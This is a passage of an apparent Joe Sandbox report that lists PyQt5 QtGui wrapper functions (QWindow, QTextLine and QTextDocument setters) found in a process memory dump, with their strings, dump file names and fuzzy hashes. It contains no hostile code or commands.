Opcode Fuzzy Hash: b9dbfe821308f8fd8c5916e9c6fbb36277d29528c2aaa982a3327eb5006a9506
Instruction Fuzzy Hash: 06119375B18A4AC1EB00DF25E8996AD33B5FB48BA4F954132CA5D43320EF39E95AC740

Function 00007FFD8628CF40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setTextWidth@QStaticText@@QEAAXN@Z.QT5GUI ref: 00007FFD8628CF99

Strings

setTextWidth(self, textWidth: float), xrefs: 00007FFD8628CFBC
setTextWidth, xrefs: 00007FFD8628CFC8
QStaticText, xrefs: 00007FFD8628CFCF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setStaticTextText@@Width@
String ID: QStaticText$setTextWidth$setTextWidth(self, textWidth: float)
API String ID: 2670320111-3114952658
Opcode ID: 63d6dd0286cd53b8e974e3cc91d18323fef1b552f67f239c659ce842474d0aba
Instruction ID: df3eceb219b0af4a67594e779a1eca612d4c7218616bf8718bf61b73f4c33fee
Opcode Fuzzy Hash: 63d6dd0286cd53b8e974e3cc91d18323fef1b552f67f239c659ce842474d0aba
Instruction Fuzzy Hash: 3011D335B08E46D1EB009F15E8996A933B4FB58BA4F954032CA5D03320EF39D95AC740

Function 00007FFD86250FB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setBorder@QTextTableCellFormat@@QEAAXN@Z.QT5GUI ref: 00007FFD86251009

Strings

setBorder(self, width: float), xrefs: 00007FFD8625102C
QTextTableCellFormat, xrefs: 00007FFD8625103F
setBorder, xrefs: 00007FFD86251038

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setBorder@CellFormat@@TableText
String ID: QTextTableCellFormat$setBorder$setBorder(self, width: float)
API String ID: 2224405055-3103418455
Opcode ID: 16871df274800ea4b8c0f473747b862e14b38d2080c2f5b73eb0a8ec48565950
Instruction ID: 1dbbcc51d530b09050c59227e4f15bda1c9feb44426804038f146b64fa972278
Opcode Fuzzy Hash: 16871df274800ea4b8c0f473747b862e14b38d2080c2f5b73eb0a8ec48565950
Instruction Fuzzy Hash: 5711D376B08E4AD5EB00DF15E8996AD33B5FB44BA4F954072CA5D03320EF39D95AC740

Function 00007FFD8625F050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setY@QWindow@@QEAAXH@Z.QT5GUI ref: 00007FFD8625F0A7

Strings

setY(self, arg: int), xrefs: 00007FFD8625F0CA
QWindow, xrefs: 00007FFD8625F0DD
setY, xrefs: 00007FFD8625F0D6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setWindow@@
String ID: QWindow$setY$setY(self, arg: int)
API String ID: 1274469726-2463763939
Opcode ID: 11daadd2e1b2d9a39026d1d15786be9f03782fcfd3bd52f64e3647d0cf4e0955
Instruction ID: caac43d972432443f41265534137c9aa07d7961c1641a2fee03b85e667386ed7
Opcode Fuzzy Hash: 11daadd2e1b2d9a39026d1d15786be9f03782fcfd3bd52f64e3647d0cf4e0955
Instruction Fuzzy Hash: 7911E576B18E4AD1EB01DF15E8996AD33B5FB48B64F954132CA5D03320DF39D94AC700

Function 00007FFD86260CD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setMaximumHeight@QWindow@@QEAAXH@Z.QT5GUI ref: 00007FFD86260D27

Strings

setMaximumHeight(self, h: int), xrefs: 00007FFD86260D4A
QWindow, xrefs: 00007FFD86260D5D
setMaximumHeight, xrefs: 00007FFD86260D56

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setHeight@MaximumWindow@@
String ID: QWindow$setMaximumHeight$setMaximumHeight(self, h: int)
API String ID: 184394723-1141678543
Opcode ID: a28b6d98ac2a1d628cfee6fd3fab0b36467cff1bae50acd93845b2f08da61227
Instruction ID: 7f88376500bdec6298b2e94e870d81ac0ffc09044f44ae12db5220422e080cb4
Opcode Fuzzy Hash: a28b6d98ac2a1d628cfee6fd3fab0b36467cff1bae50acd93845b2f08da61227
Instruction Fuzzy Hash: 2411D375B18E4AD1EB00DF15E8986AD33B5FB44B64F954132CA4D03320DF39E94AC700

Function 00007FFD8625ECC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setX@QWindow@@QEAAXH@Z.QT5GUI ref: 00007FFD8625ED17

Strings

setX(self, arg: int), xrefs: 00007FFD8625ED3A
QWindow, xrefs: 00007FFD8625ED4D
setX, xrefs: 00007FFD8625ED46

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setWindow@@
String ID: QWindow$setX$setX(self, arg: int)
API String ID: 1274469726-39101024
Opcode ID: 54be35e1cf59dae69d084ca2ec6a092a5e4316607593b7847030f5f1b63033b0
Instruction ID: 1514151099e7814fa7a63c0d41003e219c2939f2abb8a5f74df2497ed765c1c7
Opcode Fuzzy Hash: 54be35e1cf59dae69d084ca2ec6a092a5e4316607593b7847030f5f1b63033b0
Instruction Fuzzy Hash: 8511E576B18E4AC1EB00DF15E8996AD33B5FB48B54F954132CA5D03720DF39D94AC700

Function 00007FFD86254CB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setMaximumTouchPoints@QTouchDevice@@QEAAXH@Z.QT5GUI ref: 00007FFD86254D07

Strings

QTouchDevice, xrefs: 00007FFD86254D3D
setMaximumTouchPoints, xrefs: 00007FFD86254D36
setMaximumTouchPoints(self, max: int), xrefs: 00007FFD86254D2A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Touch$?setDevice@@MaximumPoints@
String ID: QTouchDevice$setMaximumTouchPoints$setMaximumTouchPoints(self, max: int)
API String ID: 3229369142-918839554
Opcode ID: 9f1b04d9cb32815395487619fcee262b4b328672a10b426564b4b47531e93233
Instruction ID: 7453e85a3b8bbbd81cb428fdd381a264f653758aebed1ca0fb95ad86dc82caa7
Opcode Fuzzy Hash: 9f1b04d9cb32815395487619fcee262b4b328672a10b426564b4b47531e93233
Instruction Fuzzy Hash: 1D11D335B18E4AD1EB009F25E8996AD33B5FB48BA4F954132CA4D03720EF39E94AC740

Function 00007FFD862AACA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setAutoTristate@QStandardItem@@QEAAX_N@Z.QT5GUI ref: 00007FFD862AACF8

Strings

setAutoTristate, xrefs: 00007FFD862AAD27
QStandardItem, xrefs: 00007FFD862AAD2E
setAutoTristate(self, tristate: bool), xrefs: 00007FFD862AAD1B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setAutoItem@@StandardTristate@
String ID: QStandardItem$setAutoTristate$setAutoTristate(self, tristate: bool)
API String ID: 1473524681-3142682503
Opcode ID: 67b89047900365938d5481566f31c81bd6250ce57db1c3fd01b23864be4f4ead
Instruction ID: ba54783917c92b67e742258bd8a37f789cad7c5911e3ae3cd91539c7f2c57ac2
Opcode Fuzzy Hash: 67b89047900365938d5481566f31c81bd6250ce57db1c3fd01b23864be4f4ead
Instruction Fuzzy Hash: 92111575B08E46C1EB00AF15E8A96A937B4FB48BA4F954072CA4D03320EF3DD94AC700

Function 00007FFD86244D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setIndentWidth@QTextDocument@@QEAAXN@Z.QT5GUI ref: 00007FFD86244D99

Strings

setIndentWidth(self, width: float), xrefs: 00007FFD86244DBC
QTextDocument, xrefs: 00007FFD86244DCF
setIndentWidth, xrefs: 00007FFD86244DC8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setDocument@@IndentTextWidth@
String ID: QTextDocument$setIndentWidth$setIndentWidth(self, width: float)
API String ID: 3419507154-736841404
Opcode ID: 3ee093fb5f45dead65dd26dcbc6017fb6bedd610f5aefdc977652a1285715411
Instruction ID: 594c7421db93e0b3547676315f7b83d151589484ec280bc2b6fc1fa1f69ce577
Opcode Fuzzy Hash: 3ee093fb5f45dead65dd26dcbc6017fb6bedd610f5aefdc977652a1285715411
Instruction Fuzzy Hash: C411D335B08E46D5EB00AF25E8A96AD33B5FB48BA4F954032CA5D03320DF3DD95AC740

Function 00007FFD86232D80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setLineWidth@QTextLine@@QEAAXN@Z.QT5GUI ref: 00007FFD86232DD9

Strings

setLineWidth(self, width: float), xrefs: 00007FFD86232DFC
QTextLine, xrefs: 00007FFD86232E0F
setLineWidth, xrefs: 00007FFD86232E08

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setLineLine@@TextWidth@
String ID: QTextLine$setLineWidth$setLineWidth(self, width: float)
API String ID: 3754226335-3059169489
Opcode ID: ec169932d82b7405d04053cfab7c9237c84f2e1915d12a6d54671152a085111c
Instruction ID: 085e748ce122a2328ed477ec322f4e2d5c89fdd97d288ca2e2e80cfe4677e800
Opcode Fuzzy Hash: ec169932d82b7405d04053cfab7c9237c84f2e1915d12a6d54671152a085111c
Instruction Fuzzy Hash: C011D335B08E46D1EB00EF15E8A96AD33B5FB48BA4F954072CA5D03320DF39D95AC740

Function 00007FFD86288250 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setWidth@QPainterPathStroker@@QEAAXN@Z.QT5GUI ref: 00007FFD862882A9

Strings

setWidth, xrefs: 00007FFD862882D8
setWidth(self, width: float), xrefs: 00007FFD862882CC
QPainterPathStroker, xrefs: 00007FFD862882DF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

